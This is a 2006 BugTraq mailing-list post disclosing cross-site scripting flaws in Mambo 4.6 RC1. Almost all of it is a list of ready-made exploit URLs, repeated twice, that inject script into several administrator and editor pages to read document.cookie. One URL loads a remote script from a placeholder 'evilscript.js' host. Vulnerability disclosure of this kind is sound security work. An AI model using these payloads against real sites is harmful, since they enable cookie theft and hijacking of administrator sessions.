BugTraq
Back to list
|
Post reply
Mambo <= 4.6. RC1 xss
May 23 2006 11:30AM
rgod autistici org
Mambo <= 4.6. RC1 Cross Site Scripting
---------------------------------------
http://[target]/[path_to_mambo]/administrator/popups/index3pop.php?mosCo
nfig_sitename=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/popupImage.php?img_title=</title><script>alert(document.cookie)</scri
pt>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/caption/colorpicker.php?cur_colour=--%3E%3C/script%3E%3C/head
%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/caption/colorpicker.php?func=--%3E%3C/script%3E%3C/head%3E%3C
body%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/caption/colorpicker.php?block=--%3E%3C/script%3E%3C/head%3E%3
Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location
/evilscript.js
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3C
script%3Ealert(document.cookie)%3C/script%3E
---------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
---------------------------------------
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
---------------------------------------
http://[target]/[path_to_mambo]/administrator/popups/index3pop.php?mosCo
nfig_sitename=</title><script>alert(document.cookie)</script>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/popupImage.php?img_title=</title><script>alert(document.cookie)</scri
pt>
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/caption/colorpicker.php?cur_colour=--%3E%3C/script%3E%3C/head
%3E%3Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/caption/colorpicker.php?func=--%3E%3C/script%3E%3C/head%3E%3C
body%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/caption/colorpicker.php?block=--%3E%3C/script%3E%3C/head%3E%3
Cbody%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location
/evilscript.js
http://[target]/[path_to_mambo]/mambots/editors/mostlyce/jscripts/tiny_m
ce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3C
script%3Ealert(document.cookie)%3C/script%3E
---------------------------------------
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
---------------------------------------
[ reply ]